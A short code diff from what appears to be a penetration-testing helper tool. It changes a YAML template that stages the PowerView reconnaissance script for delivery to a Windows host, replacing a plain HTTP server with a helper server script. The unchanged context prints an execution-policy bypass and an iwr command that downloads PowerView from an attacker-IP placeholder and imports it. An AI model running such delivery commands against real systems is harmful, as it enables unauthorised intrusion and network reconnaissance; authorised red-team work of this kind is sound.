--- a/src/profi/templates/scripts/deliver-windows-powerview.ps1.yaml
+++ b/src/profi/templates/scripts/deliver-windows-powerview.ps1.yaml
@@ -12,4 +12,4 @@ content: |
   echo 'Preparation: powershell -ep bypass'; \
   echo 'Deliver and import module: iwr -uri http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/powerview.ps1 -Outfile <%=$(esh variables/delivery_path_windows)%>\powerview.ps1; Import-Module <%=$(esh variables/delivery_path_windows)%>\powerview.ps1'; \
   echo '================================================================'; \
-  python -m http.server <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
+   python <%=$(esh variables/templates_dir)%>/helper_scripts/startEnhancedHttpServer.py -p <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
